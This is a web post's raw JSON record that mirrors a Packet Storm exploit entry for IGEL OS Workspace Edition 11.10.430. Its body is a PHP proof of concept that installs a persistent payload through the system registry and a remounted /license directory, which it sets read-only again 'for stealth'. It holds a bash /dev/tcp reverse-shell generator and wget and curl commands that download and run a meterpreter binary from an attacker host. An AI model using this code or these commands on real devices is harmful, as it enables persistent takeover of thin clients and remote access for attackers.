{"id":31578,"date":"2025-12-17T11:50:47","date_gmt":"2025-12-17T11:50:47","guid":{"rendered":"http:\/\/localhost\/?p=31578"},"modified":"2025-12-17T11:50:47","modified_gmt":"2025-12-17T11:50:47","slug":"igel-os-workspace-edition-1110430-persistent-payload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31578","title":{"rendered":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929"},"content":{"rendered":"

{“lastseen”:”2025-12-17T16:38:06″,”description”:”IGEL OS Workspace Edition version 11.10.430 contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system’s registry configuration. The vulnerability leverages IGEL OS’s…”,”published”:”2025-12-17T00:00:00″,”modified”:”2025-12-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload”,”source”:””,”references”:””,”id”:”PACKETSTORM:212929″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : IGEL OS Workspace Edition 11.10.430 Persistent Payload Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.igel.com\/software-downloads\/workspace-edition\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212100\/\\n \\n [+] Summary : \\n IGEL OS Workspace Edition contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system’s registry configuration. \\n \\t\\t\\t The vulnerability leverages IGEL OS’s custom registry system and mount point configurations to maintain access across reboots.\\n \\t\\t\\t The persistence mechanism exploits IGEL OS’s unique architecture that uses a custom registry system (\/bin\/get, \/bin\/setparam) and a writable \/license directory that can be remounted with execution privileges.\\n [+] POC : \\n \\n php poc.php \\n \\n \\u003c?php\\n \\n class IgelOSPersistentPayload {\\n \\n private $session;\\n private $registry_key;\\n private $target_dir;\\n private $registry_only;\\n \\n public function __construct($session_handler, $registry_key = null, $target_dir = ‘\/license’, $registry_only = false) {\\n $this-\\u003esession = $session_handler;\\n $this-\\u003eregistry_key = $registry_key ?: ‘userinterface.rccustom.custom_cmd_net_final’;\\n $this-\\u003etarget_dir = $target_dir;\\n $this-\\u003eregistry_only = $registry_only;\\n }\\n \\n public function validate() {\\n echo \\”[*] Validating IGEL OS environment…\\\\n\\”;\\n \\n \/\/ Check if we have root access\\n if (!$this-\\u003eis_root()) {\\n throw new Exception(\\”Session does not have root access\\”);\\n }\\n \\n \/\/ Check if we’re on IGEL OS\\n if (!$this-\\u003eis_igel_os()) {\\n throw new Exception(\\”Target does not appear to be IGEL OS\\”);\\n }\\n \\n echo \\”[+] Validation successful – IGEL OS with root access detected\\\\n\\”;\\n return true;\\n }\\n \\n public function install_persistence($payload_type, $payload_data) {\\n try {\\n echo \\”[*] Installing persistent payload on IGEL OS…\\\\n\\”;\\n \\n \/\/ Validate environment first\\n $this-\\u003evalidate();\\n \\n $command = null;\\n \\n switch ($payload_type) {\\n case ‘linux_command’:\\n $command = $payload_data;\\n break;\\n \\n case ‘linux_dropper’:\\n if ($this-\\u003eregistry_only) {\\n echo \\”[*] Base64-encoding payload for registry storage\\\\n\\”;\\n $encoded_payload = base64_encode($payload_data);\\n $command = $this-\\u003ebase64_command($encoded_payload);\\n } else {\\n echo \\”[*] Uploading payload to {$this-\\u003etarget_dir}\\\\n\\”;\\n $payload_file = $this-\\u003ewrite_payload($payload_data, $this-\\u003etarget_dir, 0700);\\n $command = $this-\\u003elocal_command($payload_file);\\n }\\n break;\\n \\n default:\\n throw new Exception(\\”Unsupported payload type: {$payload_type}\\”);\\n }\\n \\n echo \\”[*] Writing persistence to registry key: {$this-\\u003eregistry_key}\\\\n\\”;\\n $this-\\u003ewrite_registry($this-\\u003eregistry_key, $command);\\n \\n \/\/ Verify the registry write\\n $stored_command = $this-\\u003eget_registry($this-\\u003eregistry_key);\\n if ($stored_command !== $command) {\\n throw new Exception(\\”Failed to write to registry – verification failed\\”);\\n }\\n \\n echo \\”[+] Persistence installed successfully\\\\n\\”;\\n echo \\”[*] Payload will execute when the target reboots\\\\n\\”;\\n \\n return true;\\n \\n } catch (Exception $e) {\\n echo \\”[-] Persistence installation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n \\n private function remount_license($options = ‘rw’) {\\n echo \\”[*] Remounting \/license with options: {$options}\\\\n\\”;\\n return $this-\\u003eexecute_command(\\”\/bin\/mount -o remount,{$options} \/license\\”);\\n }\\n \\n private function write_payload($contents, $directory, $permissions) {\\n \/\/ Remount \/license as writable\\n $this-\\u003eremount_license(‘rw’);\\n \\n $filename = $this-\\u003egenerate_random_name(8);\\n $filepath = \\”{$directory}\/{$filename}\\”;\\n \\n echo \\”[*] Writing payload to: {$filepath}\\\\n\\”;\\n \\n \/\/ Upload the payload\\n if (!$this-\\u003eupload_file($filepath, $contents)) {\\n throw new Exception(\\”Failed to write payload to filesystem\\”);\\n }\\n \\n \/\/ Set permissions\\n $this-\\u003eexecute_command(\\”\/bin\/chmod \\” . decoct($permissions) . \\” {$filepath}\\”);\\n \\n \/\/ Remount \/license as read-only for stealth\\n $this-\\u003eremount_license(‘ro’);\\n \\n \/\/ Register file for potential cleanup\\n $this-\\u003eregister_cleanup_file($filepath);\\n \\n echo \\”[+] Payload written successfully: {$filepath}\\\\n\\”;\\n return $filepath;\\n }\\n \\n private function base64_command($encoded_payload) {\\n $payload_dest = \\”\/tmp\/\\” . $this-\\u003egenerate_random_name(8);\\n \\n $command = \\”\/bin\/bash -c ‘\\”;\\n $command .= \\”\/bin\/echo \\” . escapeshellarg($encoded_payload) . \\” | \\”;\\n $command .= \\”\/usr\/bin\/base64 -d \\u003e \\” . escapeshellarg($payload_dest) . \\”; \\”;\\n $command .= \\”\/bin\/chmod +x \\” . escapeshellarg($payload_dest) . \\”; \\”;\\n $command .= escapeshellarg($payload_dest) . \\” \\u0026’\\”;\\n \\n echo \\”[*] Generated base64 command for registry storage\\\\n\\”;\\n return $command;\\n }\\n \\n private function local_command($payload_file) {\\n $command = \\”\/bin\/bash -c ‘\\”;\\n $command .= \\”\/bin\/mount -o remount,exec \/license; \\”;\\n $command .= escapeshellarg($payload_file) . \\” \\u0026’\\”;\\n \\n echo \\”[*] Generated local command for payload execution\\\\n\\”;\\n return $command;\\n }\\n \\n private function get_registry($key) {\\n $result = $this-\\u003eexecute_command(\\”\/bin\/get \\” . escapeshellarg($key));\\n return trim($result);\\n }\\n \\n private function write_registry($key, $value) {\\n $result = $this-\\u003eexecute_command(\\”\/bin\/setparam \\” . escapeshellarg($key) . \\” \\” . escapeshellarg($value));\\n \\n if (strpos($result, ‘error’) !== false || strpos($result, ‘failed’) !== false) {\\n throw new Exception(\\”Registry write failed: {$result}\\”);\\n }\\n \\n echo \\”[+] Registry key written: {$key}\\\\n\\”;\\n return true;\\n }\\n \\n private function is_root() {\\n $result = $this-\\u003eexecute_command(‘id -u’);\\n return trim($result) === ‘0’;\\n }\\n \\n private function is_igel_os() {\\n \/\/ Check for IGEL OS specific files and commands\\n $checks = [\\n ‘test -f \/usr\/bin\/get’,\\n ‘test -f \/usr\/bin\/setparam’,\\n ‘test -d \/license’,\\n ‘cat \/etc\/issue | grep -i igel’\\n ];\\n \\n foreach ($checks as $check) {\\n $result = $this-\\u003eexecute_command(\\”{$check} \\u0026\\u0026 echo ‘IGEL_FOUND’ || echo ‘IGEL_NOT_FOUND’\\”);\\n if (strpos($result, ‘IGEL_FOUND’) !== false) {\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n private function execute_command($command) {\\n return $this-\\u003esession-\\u003eexecute($command);\\n }\\n \\n private function upload_file($remote_path, $content) {\\n return $this-\\u003esession-\\u003eupload_content($remote_path, $content);\\n }\\n \\n private function generate_random_name($length) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyz’;\\n $name = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $name .= $chars[random_int(0, strlen($chars) – 1)];\\n }\\n return $name;\\n }\\n \\n private function register_cleanup_file($filepath) {\\n \/\/ In a full implementation, this would track files for cleanup\\n echo \\”[*] Registered for cleanup: {$filepath}\\\\n\\”;\\n }\\n \\n public function cleanup() {\\n echo \\”[*] Cleaning up persistence…\\\\n\\”;\\n \\n try {\\n \/\/ Remove registry entry\\n $this-\\u003eexecute_command(\\”\/bin\/setparam \\” . escapeshellarg($this-\\u003eregistry_key) . \\” \\\\\\”\\\\\\”\\”);\\n echo \\”[+] Registry entry cleared\\\\n\\”;\\n } catch (Exception $e) {\\n echo \\”[-] Failed to clear registry entry: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n }\\n \\n \/\/ Payload generators for IGEL OS\\n class IgelPayloadGenerator {\\n \\n public static function generate_linux_reverse_shell($lhost, $lport) {\\n return \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261\\”;\\n }\\n \\n public static function generate_meterpreter_linux($lhost, $lport) {\\n \/\/ This would be a Linux meterpreter payload\\n \/\/ In reality, you’d generate or fetch the actual binary\\n return \\”wget -O \/tmp\/meterpreter http:\/\/{$lhost}:8080\/linux_x64_meterpreter \\u0026\\u0026 chmod +x \/tmp\/meterpreter \\u0026\\u0026 \/tmp\/meterpreter\\”;\\n }\\n \\n public static function generate_https_meterpreter($lhost, $lport) {\\n return \\”curl -so \/tmp\/m https:\/\/{$lhost}:{$lport}\/payload \\u0026\\u0026 chmod +x \/tmp\/m \\u0026\\u0026 \/tmp\/m\\”;\\n }\\n \\n public static function generate_simple_test() {\\n return \\”echo ‘Persistence test successful’ \\u003e \/tmp\/igel_test.txt\\”;\\n }\\n }\\n \\n \/\/ Session handler interface for IGEL OS\\n class IgelSessionHandler {\\n private $connection;\\n \\n public function __construct($host, $username, $password, $port = 22) {\\n \/\/ This would establish an SSH connection to the IGEL OS device\\n \/\/ For demonstration, we’ll simulate the connection\\n $this-\\u003econnection = [\\n ‘host’ =\\u003e $host,\\n ‘username’ =\\u003e $username,\\n ‘port’ =\\u003e $port\\n ];\\n \\n echo \\”[*] IGEL OS session initialized for: {$username}@{$host}:{$port}\\\\n\\”;\\n }\\n \\n public function execute($command) {\\n \/\/ Simulate command execution on IGEL OS\\n echo \\”[DEBUG] Executing: {$command}\\\\n\\”;\\n \\n \/\/ Simulate different command responses\\n if (strpos($command, ‘id -u’) !== false) {\\n return \\”0\\\\n\\”; \/\/ root user\\n } elseif (strpos($command, ‘test -f \/usr\/bin\/get’) !== false) {\\n return \\”IGEL_FOUND\\\\n\\”;\\n } elseif (strpos($command, ‘cat \/etc\/issue’) !== false) {\\n return \\”IGEL OS 11.05.100\\\\nIGEL_FOUND\\\\n\\”;\\n } elseif (strpos($command, ‘\/bin\/get’) !== false) {\\n return \\”previous_value\\\\n\\”;\\n } elseif (strpos($command, ‘\/bin\/setparam’) !== false) {\\n return \\”parameter_set\\\\n\\”;\\n } elseif (strpos($command, ‘mount’) !== false) {\\n return \\”filesystem_remounted\\\\n\\”;\\n }\\n \\n return \\”command_executed\\\\n\\”;\\n }\\n \\n public function upload_content($remote_path, $content) {\\n \/\/ Simulate file upload\\n echo \\”[DEBUG] Uploading \\” . strlen($content) . \\” bytes to: {$remote_path}\\\\n\\”;\\n return true;\\n }\\n }\\n \\n \/\/ Command line interface\\n if (php_sapi_name() === ‘cli’ \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) === basename(__FILE__)) {\\n \\n if ($argc \\u003c 4) {\\n echo \\”IGEL OS Persistent Payload Installer\\\\n\\”;\\n echo \\”====================================\\\\n\\”;\\n echo \\”Usage: php \\” . $argv[0] . \\” \\u003chost\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e [options]\\\\n\\”;\\n echo \\”Example: php \\” . $argv[0] . \\” 192.168.1.100 root password123\\\\n\\”;\\n echo \\”\\\\nOptions (environment variables):\\\\n\\”;\\n echo \\”PAYLOAD_TYPE=linux_command|linux_dropper\\\\n\\”;\\n echo \\”REGISTRY_KEY=userinterface.rccustom.custom_cmd_net_final\\\\n\\”;\\n echo \\”TARGET_DIR=\/license\\\\n\\”;\\n echo \\”REGISTRY_ONLY=false\\\\n\\”;\\n echo \\”LHOST=192.168.1.50 LPORT=4444\\\\n\\”;\\n echo \\”CMD=’whoami; id; hostname’\\\\n\\”;\\n exit(1);\\n }\\n \\n $host = $argv[1];\\n $username = $argv[2];\\n $password = $argv[3];\\n \\n \/\/ Parse environment variables\\n $payload_type = getenv(‘PAYLOAD_TYPE’) ?: ‘linux_command’;\\n $registry_key = getenv(‘REGISTRY_KEY’) ?: ‘userinterface.rccustom.custom_cmd_net_final’;\\n $target_dir = getenv(‘TARGET_DIR’) ?: ‘\/license’;\\n $registry_only = getenv(‘REGISTRY_ONLY’) === ‘true’;\\n $lhost = getenv(‘LHOST’) ?: ‘ATTACKER_IP’;\\n $lport = getenv(‘LPORT’) ?: ‘4444’;\\n $custom_cmd = getenv(‘CMD’) ?: ‘whoami; id; hostname’;\\n \\n try {\\n echo \\”[*] Initializing IGEL OS persistence exploit…\\\\n\\”;\\n echo \\”[*] Target: {$username}@{$host}\\\\n\\”;\\n echo \\”[*] Payload type: {$payload_type}\\\\n\\”;\\n echo \\”[*] Registry key: {$registry_key}\\\\n\\”;\\n echo \\”[*] Target directory: {$target_dir}\\\\n\\”;\\n echo \\”[*] Registry only: \\” . ($registry_only ? ‘yes’ : ‘no’) . \\”\\\\n\\”;\\n \\n $session = new IgelSessionHandler($host, $username, $password);\\n $exploit = new IgelOSPersistentPayload($session, $registry_key, $target_dir, $registry_only);\\n \\n \/\/ Generate payload based on type\\n $payload_data = match($payload_type) {\\n ‘linux_command’ =\\u003e $lhost !== ‘ATTACKER_IP’ \\n ? IgelPayloadGenerator::generate_linux_reverse_shell($lhost, $lport)\\n : $custom_cmd,\\n ‘linux_dropper’ =\\u003e $lhost !== ‘ATTACKER_IP’\\n ? IgelPayloadGenerator::generate_meterpreter_linux($lhost, $lport)\\n : IgelPayloadGenerator::generate_simple_test(),\\n default =\\u003e throw new Exception(\\”Unsupported payload type: {$payload_type}\\”)\\n };\\n \\n if ($payload_type === ‘linux_dropper’ \\u0026\\u0026 $registry_only) {\\n echo \\”[*] Payload will be stored in registry (base64 encoded)\\\\n\\”;\\n } elseif ($payload_type === ‘linux_dropper’) {\\n echo \\”[*] Payload will be written to filesystem\\\\n\\”;\\n }\\n \\n if ($lhost !== ‘ATTACKER_IP’) {\\n echo \\”[*] Using reverse connection: {$lhost}:{$lport}\\\\n\\”;\\n } else {\\n echo \\”[*] Using command: {$payload_data}\\\\n\\”;\\n }\\n \\n \/\/ Install persistence\\n $success = $exploit-\\u003einstall_persistence($payload_type, $payload_data);\\n \\n if ($success) {\\n echo \\”[+] Persistence installed successfully!\\\\n\\”;\\n echo \\”[*] The payload will execute when the IGEL OS device reboots\\\\n\\”;\\n echo \\”[*] Use cleanup() method to remove persistence if needed\\\\n\\”;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploitation failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n ?\\u003e\\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212929″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212929\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-17T16:38:06″,”description”:”IGEL OS Workspace Edition version 11.10.430 contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system’s…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-31578","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31578\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-17T16:38:06″,”description”:”IGEL OS Workspace Edition version 11.10.430 contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system’s...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31578\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-17T11:50:47+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929\",\"datePublished\":\"2025-12-17T11:50:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578\"},\"wordCount\":2073,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31578#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578\",\"name\":\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-17T11:50:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31578\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31578#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31578","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929 - zero redgem","og_description":"{“lastseen”:”2025-12-17T16:38:06″,”description”:”IGEL OS Workspace Edition version 11.10.430 contains a persistence mechanism that allows authenticated attackers with root access to establish persistent code execution through the system’s...","og_url":"https:\/\/zero.redgem.net\/?p=31578","og_site_name":"zero redgem","article_published_time":"2025-12-17T11:50:47+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31578#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31578"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929","datePublished":"2025-12-17T11:50:47+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31578"},"wordCount":2073,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31578#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31578","url":"https:\/\/zero.redgem.net\/?p=31578","name":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-17T11:50:47+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31578#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31578"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31578#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 IGEL OS Workspace Edition 11.10.430 Persistent Payload_PACKETSTORM:212929"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31578","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31578"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31578\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}